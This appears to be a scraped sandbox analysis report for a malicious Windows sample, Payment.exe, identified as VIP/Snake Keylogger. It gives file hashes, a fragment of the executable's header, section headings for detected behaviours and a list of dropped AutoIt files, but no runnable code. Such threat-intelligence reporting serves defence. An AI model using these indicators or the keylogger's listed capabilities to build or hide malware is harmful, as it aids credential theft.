SSDEEP:	98304:RlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLtUf:nkkCqaE68eV+0ynE6LtUf
MD5:	EAC4F096370C6C122F5E013026A4345C
SHA1:	DB38ABB3D71EFC8DBA95903884C258DEB1EAEDD2
SHA-256:	30E0FFF04A16D9DD843785F2208673333A6554010DB7F584FEE69A60EDB56A9D
SHA-512:	751F1D9FC3DC05BA08401F168109E6A7FC4515010A88701D28C9A6FC4184A1D659C8751CC80503E42334C22C2F03BEFD75D8E772793B6263C84C311BF2048BCD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL.......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Windows Analysis Report
Payment.exe